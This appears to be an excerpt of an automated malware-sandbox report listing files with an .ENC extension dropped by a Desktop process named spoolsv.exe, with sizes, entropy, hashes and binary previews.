                                                                                                                                                                                                                                                      SHA-256:FF2D215CFC56E48A516D7B85F8AE24895E15B06FBD0270D381BE3BE249B14527
                                                                                                                                                                                                                                                      SHA-512:F348B12208BD8AE6B111F0F95FB8B73BAA29885758B8794E8533A85347249A6F80CFBDD0B6EFDC252471377417D6CEEF9BE696F7633AB07ED02C498DFF28FEAC
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t....g.....R.-.8.1Y..D..1.z 4.L6!.Z.(.cM;.......H-..@.C...............rK..`...X.....P>..B.n-.*......P.z+.J..-.=....H..v....2u.C`...`c...gb...8..313W....O.i.21..f.(.'.!:W.E4_T............@.......G........<.,..6.....Q...}...................D.l.`.v...u...?..s.i;.o.g..(M|..q.)/'#..1..t"...(..>.=|.Y....................P.8.s.9w.L.......5%..o..^........|}........yY.I...[...aW.E.....|3%...../J.3.)...x..G..$8.z.a........\..4..v@....C.ka..=...P.....H.T.ZL:....L....p..=..eW.1..AXe....V*..3."..*...DY-.....0.Yq.J.T.E.4R..|.....`.@.E.O., .w"..hC..J......1. w.3^........q.[.V.kj...G.....y.{#OD.. .S.4.m .7.z....P!........}0C.....63j....]:N...Hfl..iu..G....u..G.12....|..%....~....r.YQ..9P....O.D .J.v..1.5i.J.0...'c)b...Vb.........7...u.{`..;|.Nn`..Z'.M.J.Z.+..8.A..\u{.vN0...x7..G5..U...~....\T..G.MU...o..t.-.fq...C.....6-..mW...j.F..6.Z,...bI2t.Br.O..x..vp/Q..H....k......... ..\....I..,.....^.!.t

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule70030v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):448
                                                                                                                                                                                                                                                      Entropy (8bit):7.557817918753223
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:fm7kBrg8qOE6TbT/CfHdIoy7TDT4vascpXxP51UB+ZTQFMPECbTocZTDVxABYcE5:fmnfO1Tn/Cfz7Jc5EmEoT3ZTuYlTF
                                                                                                                                                                                                                                                      MD5:7CA7E06DCF4ABDDC33FBEBAF8381B311
                                                                                                                                                                                                                                                      SHA1:66C055D84CBEADD10D3093004B4755CDD8339414
                                                                                                                                                                                                                                                      SHA-256:9729554C7229BA62A12B73EFCF72D460304A5EC6FA1C1628518EB101E399264A
                                                                                                                                                                                                                                                      SHA-512:CE700D6225651EC8B72D463DE8F49D386DA69BFC8920383AD5B9AF85D4A8294E24ECF78A03ED86792DA830604830693D435F1D719D60A98B2A44EA5F187440AF
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F....3<B....`..C.I..Cq.{._...R.|....i/L*...!....X(,.~.Z*..B......%.........Y.....[..VD..B#.n%...E.....Fm..njG..AN.....`..D.t.q...~F.qu....YC.s.W5(l{y...p.i.=.x...P,..s....?.....=.P.W.X0...)....U.W..V{.YY1.F......dX....T#[...........C..H.........._B...a.v8.wl..<...9H.i.3.....-..|..ACB..8]..".....#..e. .7.......4.F..].b.X.g...H.R..+f...F.r/...@..p.y..Te....8..O.2/hu.$..@..E.N p....W

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule70031v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):448
                                                                                                                                                                                                                                                      Entropy (8bit):7.5414524957630364
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:fmmO6be5eSotbvhyMF8q5utPs0oL82YdVIBe49oy3yQd:+mOIie1v0uzUtDoL834e4OeyQd
                                                                                                                                                                                                                                                      MD5:0849D4843112864A7A2F7873186DC3AD
                                                                                                                                                                                                                                                      SHA1:38BEAC87F03DED918C450DAB1F6A810321BB5EC5
                                                                                                                                                                                                                                                      SHA-256:81F48BB808C52565A4EAD363148457A87E1D3930275180872FE899ED2165D5D8
                                                                                                                                                                                                                                                      SHA-512:2C285B9BFF528CA90C21F4744F0E0FFA12E3CA50833C7EF6D83655BC20E8695D8114DBE15061DDE08A28E3774776D8885168A75C08D5AB3ED69900BA3F4DC946
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.W.R.qt.._..mu....P...{.'.........1.+.....0.H.jR....m...`-.LDR..qt0.M..?T...I@O.....-W.(..+.....j.oy.L...f.a.&...M...Y..9._.S.[..jjFC*..).....z........ev.ZkCi.A....E..4.c..........]C.,...G#..zj8....G+..^..[I..K...y..N..e..g.....z.$..eG....HC....a`...A..n......f..J....p..../.P..b.....q[.\.,X.....`.M/.....E..4M....w..ms../.j.{?x.6p..."...?..GL.].G...u...r?{.."du.,..9..EI].}2.\&

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700350v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.860088414606788
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/E2gg6aVZ2Tte6gcQJc90of4zbgdfgor8GnCOpWUJdv69Dlvqn:/E2ggbVZCeK2c9wgdfgohCOp76rqn
                                                                                                                                                                                                                                                      MD5:809BC7C13EAEBEE773AADA9EE59025B1
                                                                                                                                                                                                                                                      SHA1:138E0EA4C55E6A5E177ABCEF69B6FD1D283AA4C8
                                                                                                                                                                                                                                                      SHA-256:AC694089D7AC66EF16498D9B8B520FFED8BF36AB9866C2323E0488737771A37D
                                                                                                                                                                                                                                                      SHA-512:FCF11914EBB58838CE5EB28A36E1F7F0A212E0958F1AD217C06751867A18B1EE43A65E0E57AEBDF469E098AB946490F95698FC88DE5240711B7837DB6171D05B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.;.u.....f,.).7%5.#...V."6~.&..:._.......L.G....}..qFk*I....wF.\.)..aj...k.=.^.....K<.....q....V.......dF......aeg.M%.u-.<.*..>.....J'.}.j.3.........H..y.w.,+...e....T.%J..N..s..D.w."[.Y.d0.J\..$..<.>.......6...n.4..>.@\.ssC.'6...7..`.C....c<....]..|*..a.....V@jVh.B......j...7.0.w1;<.,.S....8.Ns....IYE.....|]s.1.Z..t.@..y.(..E.J.....-.......U.Z........bf8..R".g....U...!.....\.p?.W...B....m.~.3;....,..}A_..u?.G...^X0q.8...B).f?pI.So.....*..2i..Gg."N...}.G..Hu....bS...:w...:JE.E.]:.....#.;..3....[...7..ci3.[\..{.........j;x.uw.>.....i..,....o.7.).L.....0.L..<...4.h...`..`...G....e5M.#.h..Ut...[>j.b.7...l....h...`..A.H..[3.....RZ.N.7.5oK..b...Z....u.B.=.da.-.....,$g....".u..'t..9.X.(.%...@.$......_Q.I....c........#...E..|;..L......=fd..jo.VI.....9...#)mP7v.'.....F......p..j....#......../s3.55.+z.....CM.|..im./.]...1.xY|...<...........K..T.v...F1.:k...HB=...".`."`..5..m.b.>$.......t,.e.3..?.-....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700351v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.884322674669059
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/3/pL2KRv+4Ss04imy0rPcenCM9Andzh4MnazPSwwMbyqFPK9uPBK1M:/N7v+rsXzpwenCMqnYMaHzbyqFxpn
                                                                                                                                                                                                                                                      MD5:268C86B91B31DBECD306C96F3E83ABBB
                                                                                                                                                                                                                                                      SHA1:EA94A516F0B330356435C66A06C3E87CCF87B17D
                                                                                                                                                                                                                                                      SHA-256:5C37AD72BA2E9609ADCA85F71B6F24F4C9AE57A9FCC01EEA214B5751BBB1423B
                                                                                                                                                                                                                                                      SHA-512:9D3282BFDCA01AA073F7664DA21E2EEFD89BACCBAA0950B1ED1F34641040902B5803F956EE90F9D2500652676628C0CF093B71530F2E618E6D4081D5A252F423
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.=........."...|.+.+."X.H.u..No%.....*.....l..F..d.06...)!...<.Z..v.$./F.. +.....%.u..'.r..g....K{..(.V......3(....=..d .V+.j{.........?3..(v...3.`...h...&@....c.&..]....;01..H`...h......8.]....C@..y.Y.h.9j.a....8)_.....C......|;.b.ru.L..).D.........<.?{..J.|.X.nK..(m.k//].b/..x..y...GS.C.b.P.)...q.k.mTN....q.\.....}...*,..........;] .....7.\}N.p.F...R.&w~.D.Q..&...(U.b.Aw L.......wH.....XC..q....h....3.i.R|...I.g..L.Jp...U..>....B..{_.r.K.~...../.T..n.;6...7.*9.T..c...........-..f......9....*u..H...e.u..6..z..pQJ.I.g.. cV.4s.w..B...Q..4;.Y*..V3.S.h\..b..8.........RB;#...3U^{...JK...6.7.....#`'0.3>[.....@.\..u..:.../[.H.t.K..>8.h...x-.Q.15..M.............^r`X...h4.8P...Jc......-......b|..K.j....[.).-WJ...l..F...L....2..3..]..P.[P...E...u.I.dX4Ha...:..c8\7W..).)..:.C.1D...H}..e7....-]"..S.m0."<R@.......elHG...YG...t..T7.:}.\_C..K.:2.\e.Q....H.....'.(......#.Y...c|...Z..Hi.....I.~........../.u...z'.;r..X.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule70036v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):432
                                                                                                                                                                                                                                                      Entropy (8bit):7.581219859779544
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:fmi6r8wqGjYo9fz1dp7E7xaH8N0/fkXoggKYh56s7veM:+is8wrM2z1MxaOU5nX
                                                                                                                                                                                                                                                      MD5:3C5928065EB5061F0BE63B5460572223
                                                                                                                                                                                                                                                      SHA1:6E2F369848817A8F7DE162B6B86FA815ED6F680F
                                                                                                                                                                                                                                                      SHA-256:F0D921117BD10EFE928BD71DE9585486407279D802DF08D2F47BC39118C0E000
                                                                                                                                                                                                                                                      SHA-512:C3DA9D76F6F36C3F7797E9B7D5CF91B9830D23946C33D6867D57A7A8F34AD0DD5A5A1E62CF26499D9A5BEF583EF6EAA6E8465407AAD1E0C34348878DF5394458
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.j......&...q.M.8hm.....1p.U....g.....N.js....6j..n.C.rH.E..hX;..).:...U\.;.\...n.+..?j....Tpq.E.PT...OG1..v.{P........5.W.Lb.6wb.Dw.7_.k.|Y....,........j...C.K.7...p..A...y../:Z..8..../n..b..N....w..K..f....=...Ok.[.S;..=).......i.L1.."..C.-.&"jo".ajij...<'......9|......I.....J.Y.W.cSe...[.l.f]..NT@...i..@...;x<.|..n..;h.n.v..i......2..AC...[.'5_.2|3.u...lv./a..*

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule70037v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):448
                                                                                                                                                                                                                                                      Entropy (8bit):7.56239139896587
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:fm7qsy5jBs32WAidAdVQTk7LyGHp17DlT3TpvicPCH6ckL/oZKfZUXdLbxg8tTfp:fmj6kXAie3Vj7JTDpvoHzkzOeqXxCzC
                                                                                                                                                                                                                                                      MD5:24C3979BC1A6ECA7AC03EA9781200EDE
                                                                                                                                                                                                                                                      SHA1:86ED5A9C748204F2AC649B5A0636FC9ACADFC1BC
                                                                                                                                                                                                                                                      SHA-256:AD075B92F21FA494C61F9A8FD2427F2BA1CA986394E21F1CE5FB4D9A463C5843
                                                                                                                                                                                                                                                      SHA-512:F40E2AD390061A96AC977C49AB0F53289B5075C943482F235E903DE1257C377CE71648172C06BACEA565926FB253D97766F78DC7F745BC0D4633501CDC2E57EA
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F....f...j.R...2c-y..k.R...{05.O.q...9......[V..g.....wF.....$.@h..Z5.7;.....N.....8z.x.......M>8...j..'.S....G. 9..E.^P.M...7.%...h.%h...k.....e.M!%3s.yE..^$..0....$V.%c..&.X...K.V-..../.*.W.......nM4J.....m.E...Y{..h3.7..s.+6...K.J{yQ..g..S.2.6..r^.l.w..9.I..d(...6....6.+...E.....M....[EZX.2O..T.9.}Z.I.v....K.;8.3#j\.&s...y.".6.'..y......f..#".../...`...|L..'K........E....d.....x...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700400v2.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.847087296990043
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/KyWAA00xJileEVy2Kqu39gupfFo5HsM+pencxw0PqhQxJaSxEQyjxfDHlqM5ql9:/zzlehttSHuenLmJ/LyFfDHoM5qDf
                                                                                                                                                                                                                                                      MD5:292A3A2376EF0D2FE402D5543292F817
                                                                                                                                                                                                                                                      SHA1:146CE95006067A15D79612554B9BE03AB4D38DAF
                                                                                                                                                                                                                                                      SHA-256:1971B58F3B6850DDEC7F4F002A8918AAE68F1664D6FC9D652993BCB32BF17721
                                                                                                                                                                                                                                                      SHA-512:53D422B77291F92E8684A57EC8B1C6AAB835CE188E8CC367457DBD9EAA1372DA81CF4D2E9D6C43AE480125CDA2913D3ABB8B2244D616FBECDC3E772DC2360362
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t......W.Qw0L*/......$.1.."..L=.sGh<+ry(z.WHb.........j).;..1%{i..2g.1.k..[...g.z.....;.&(..J.W...%2.U.F...Z...1A.H.v.|.`.(.G.zX.].I{..\.~..}.f..>.s3p..!bk.Y....A.y......m.ib...I'jb[Mb.v.Qe.nE|..{bZ8.e.=...~....Y...L.q.z..l.I....TM*.1C.O.P..zC...{......./<^.....i.G...L?.W....7Ro....l....{U.!...{.Cn..f.\.|.....4.?$.r............k:.tj.........R.....>....2.6B.U.Rw.^....(._...F......F.{t.nY.5...V.}? x.(....He../..A..^...../oo..D.[..Xy....q/..o.U.:~.%F.F........$.a]4....Ae.df...bX....%.@...R...a.^5.>../.Y/.'....;.$A;..)............6...'...nA.2%............T..uL+/b..D.L...X.>#....7.<.IW.k.U}sK7.F~t.o....ZSw.Z.|...z... 1.)V..WTa...R..~1.*Nw$...2..K)....f.q...;u......g.Nr(&...j$>..I.k.>O.ms.z$..I......n.`..6...tG..$.^?....c..a.E.....9j?3.....s ....T...#.....t.j.2....K...w?....'`g.n.wkC_.QX..k..I..T.....>...D..A......s[....k....>.#.\lq.].....w....A..,^.P.R.:.Xj{.P.:.3}.z[Q.......R....W3.$G..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700401v2.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.865311877327165
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/1+1d6Zoynn6OfX3i4AXqCFiBqsLMu8M7GRY0hiMyZHgazUjjkqNZY24H:/1HZoynn6u3y9A9LMO7GS0AMyZA0yNWH
                                                                                                                                                                                                                                                      MD5:21A25A82DC549F536FE02DED6E2F8E21
                                                                                                                                                                                                                                                      SHA1:F52B4D46F6AB63E59EDC2850DB4890EFEF794C45
                                                                                                                                                                                                                                                      SHA-256:F9A9CF8AB30E20103F01B85C76AC7AE3497D32935845FD171751A0F1F63385BF
                                                                                                                                                                                                                                                      SHA-512:A586EFB126C8E5FB801C3BA4FBCCEEA12D3CCD623EC60A64EA8752FF98A8B528248411C9A11A3225A4DA31BB1840F570803D6B880EDA1526DFCAD1EE16F34E75
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t....h...ZN4.0..]a.D......&...... .......,..............$...x*C.?..i.C....Zq....!S..j.{..qE...i...v.;.)Os.+wvS..M../...,............gh.|......j7l.C&.Q\.........F...x.2.V{..\...G.~7..5....h.{ 7.AW..9..ss....7....|!.........V./P."P.8]...E..H...;VIB..v.|.1.....z.4.g..|Mr..mp:=...C.z..`...5....G..I..>D...6./.y.``.....b.]#.6A).!.._5.sT.d..h....%lug....;E....'.O._....ej.W...1..[P..XgN..&....p0G...{.2t..V....ul.l2......|.I....7.v<$.G...w.1....P.ayzK.j,.T...$R..O.u..<z3....[..... .%k.....[.tN..pZ.7...B.C.\n)s'..w.s9...J.G4...?...Y\...Sh;....Q...6W...-...=.-fO...4.*.Vr*@..b.)R......t.o.H.a....&..H..Y..r...o.,../...[.T...g......B....p.&.8.']...a......'@..o.$...eS.4AL..Kut..t^!..36.]y.....|(.gi..x.S%.5~~.........|...F....f.Y............P!..KN..AM>..G.4*.....+b.....g.L..]...e...m-..C...].....<....k.R...C/V.g....1g.5.[.Apr....g8.=..O.9...Hpb_K.....(....q...4....8.~.k....1...0.....:._?........}.p.}

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700450v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                                      Entropy (8bit):7.849768146729334
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/rx9H7ObhC7iuRe1wW73g4eIOf7f5DQLQtZMjTj4D4fkeu:/HH69CJR/Og4eHHqtfkF
                                                                                                                                                                                                                                                      MD5:AF590A78858F3166CB2049CE9FDAA44B
                                                                                                                                                                                                                                                      SHA1:0C91B40247617D38673C6013C1FA36D7F33261DF
                                                                                                                                                                                                                                                      SHA-256:30C26335BFE1B6D773829D72ADDB9D0F8FCEF7B593DF1D1C9DF094D588A04F2B
                                                                                                                                                                                                                                                      SHA-512:1246E51C4CA261EA010CD319405D072FCBD4074DE7C659B00DB4CA4E435387F91DC2F28BFB9DEA4E1B0C95EE90BC07E73ACDE7AE7D2C06110F64697C0D2E001B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..\.@.U.~...5&n.v....BF..+....t#FW.....m.:.$.7$....3bc.|..n1/x.+(j..M.............w...Oe..-..C.5...5.)..}....,.HR.Qhv ky.CK....>...}o..q.GQv.0.u...C.v.,..Mk~.bv..Eq.{s?....:..4.n..k...K.z~p..4.....~q.....1r..hAL...sE...i...4...Nz...+(Z...?.'...jr......1.....^.....?...1@.. .w ..?....Jc.<.....;....3...sf.f...A....o0...;h...#W.H....l).y..5.k....v......g.....kmL.......&dq.aQ....j..7.....;.F....HH..q....F.f....m....5.YH.0. b?..^........U...$k.sX.O.......G..j^.....$...>....k.\..7....~...Ij.O.|W...o.5......,>M8":A..........T..N....M.h..:+E_.(.VU.....q.H.Y......b..#......uk..C-...W.U4Z.Q..X.R.0.....~Y/y|.;_..:.).(t..M..K8B[.3.$..DD.....l|.Gg..........%.F{..)3......*..pC.._......../..^W...1$W.....lv..wV4.-.Jq.k..w....4N.mT.Z.B..j...._....w.a...<H4<..\0p3e....%W....v+.1...DMUh....H<..!.%x..z....9i....l...B/.....9.a..s7..C.z`.t..r.d....F...(..|pP....Yj.=(#....B....$......U.(7 .WZ;......+..t.r...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700451v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.877874133949232
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/eUPZu1lKax1kgVAWqN1Nb4JDfkW89d8xbcMoV0rFQvshtrNGsrPTAk/E2d:/nZZqAbPsdXQ8JloV0rFCshiaPTAKvd
                                                                                                                                                                                                                                                      MD5:0ADA2FB7ED71B53C4F06B1330574B4D6
                                                                                                                                                                                                                                                      SHA1:3705BC343D69A24537ED6DC79BB962F522705E0E
                                                                                                                                                                                                                                                      SHA-256:441A875B661ED3E20C7190D00EE4ED88C32FDDCB75187D531C2428595956A505
                                                                                                                                                                                                                                                      SHA-512:928C85629338F78F638AD21EA0C6D7DE5359863393B7F97317C0DF276ECAE952C4F0BD1B2EBC5091CE85287C25D0A07FF3CA85AF6BF31DF9EC943C89CC85A229
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..F""t..K.V.DMX...Ys..:.b7a]..r..(.<.I:..V.F.>.6Vg..@N...*x.....z...9.C?-......L.....#ss.O.A..Z.......p.S...+;..k.H....v.z[h.}..........GNX^2B.q....G.^..M.Y6-5.}ouv.T....'-:....8+..H..c%....tj..)..I..s+>..].=../..d.>h.%.X...Z.....K.PWA6..#]..9[Ne..{...uD.Y"osp....6@.....A2.]V."....s.. ..Gm..VX. .,P.`..e.h.9.h..........'..>`f..../".......N.[..bum...s....^.....fpc.F1...H7.U.H.jyE...9.x.-...[c.Z.m..C.diM....w...\....'t;.C.Au.t.M....si....Q.i:.*k...P..[.8...k).ur.=m.$n..}..;!.*..H....C.....u..y.\.;1....3G.d..Y[....v8...H.f..wMf......ra.!.Q....9...e.=..p!..~.3...j.F..4Ar...7i...J..E.%.D....P,e5.....O....Wg".w.sC..wY.9....... ..9..4..`.P\..[. x._.H.|S..j.m.HN....QR.^61;QjL.....V.r.o)M...J...........=..aZ.....[...eIJ......n@#I.2].!..#UP..gqv.<....\..8@(....^..6....P!Rn.@..K./..R....;.._...`.^z..8c...7`...../_j=j...[F,.*-.y$..-.L./{....'.w...\5.f..(.P.....i.....Y.-..n...xJ.:.9...,.u,......k...3^.3..=.Q7

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700500v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.869520751038593
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/YQvBexIYy3yMxb71klKJJej4t8kfZM3fIuEt2PyxILQ4+6DwWy:/LBe+iMbklKJU4tPkEt2aiQUDwWy
                                                                                                                                                                                                                                                      MD5:65066D247DD58FCEC4F8DD72103DDB71
                                                                                                                                                                                                                                                      SHA1:5892DC628A4CA7647C60235840EB07949309454A
                                                                                                                                                                                                                                                      SHA-256:564E59B2F3663B7E01D141F8700F91593CDD62EC35059064957414603F6D04F8
                                                                                                                                                                                                                                                      SHA-512:0DD184DF0CE06677F81CD49AA7E8E8B5584D15894EC3070E72B6C18BCD3E22CD4D31B3CC750E33235E8A20BB0697BFC36FC2C8D77E4B286DB057D87297BC6A73
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..<j....v."`..'...G.b........$U.A!..P.B...Zv^........;9...].Kh<xs..<..'.e.V..U%.}.Le...5.8.9..u.J..R................2..._...*..j._...Jr....Rel...V.3..X.FK...G......L...g.....R.'.?..)......R..\.....,gC......x.c....-/.Qb..f<......,...b.d.O.9.Y.../...n.E..g....(.M.jp..NZ..G.%r..N.#To6a...j.g.m...1@L9...w.a,8X...|4..\......'EO.Rz...XJn......3I..w.1W..`.}N....e.i.db:.,....h.$.A]..c.@f.n.P.N.Q/.U.....B.K.W.l.)"."..j......5.&.^...t...;...s..<..{<.o.Q.U-..O.(.5e{.L..o...H.!..N.V..6`.Y...v..yX....t..h.e...S|...HFN..Y.r..^.|.}.ws...z.b.ilCq.<.....5.i.H.....0`X...?z7...o{O..w..Gv.......IX.PIO..=.;|.....2D......o.5..b.*.!.b.V.CQ.....hF..k..f.....W.^...?..`.<n..?m+u.......G.g....f.....D......;w...Zt.o.....i.XtIk.J.. ...."....s.....=...cY....@wX.O....q.jJ...K....#A.B,1..>.."-n........./.0(.j.....s...0...a..."j....tbu.(....vg..]......t.l|..w.Q....8:.i........g..0....ZD(e...:W......_....H..<".|..9b.r.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700501v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.866993738751806
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/0yJglw8n/RtN3TbneuMoMQ7NvxpAeUic5xVKWklLtXtqJgUm4z2hB3UwM2tiiJ4:/0Yz85Dbn9BDpIr5DKWOL5kJg74z273U
                                                                                                                                                                                                                                                      MD5:A766B291D407EB7F33FDFB6A50C530AF
                                                                                                                                                                                                                                                      SHA1:69875188DAA174E5DFC1451A08B4D8FED6D73FB2
                                                                                                                                                                                                                                                      SHA-256:E535953005307663BBFE217F291B9C9D16DB7EDFB8EE178732C53A0F9C34BD9E
                                                                                                                                                                                                                                                      SHA-512:478C5D7DD8F18AA5F08ED2EB9E10CA6726614F368CEF8A46CD4FF06142A1B4B813048BA6AE04C5EF98C48892EFBC845AC4A20C6D28F590B432F100E0FD562BF1
                                                                                                                                                                                                                                                      Malicious:false
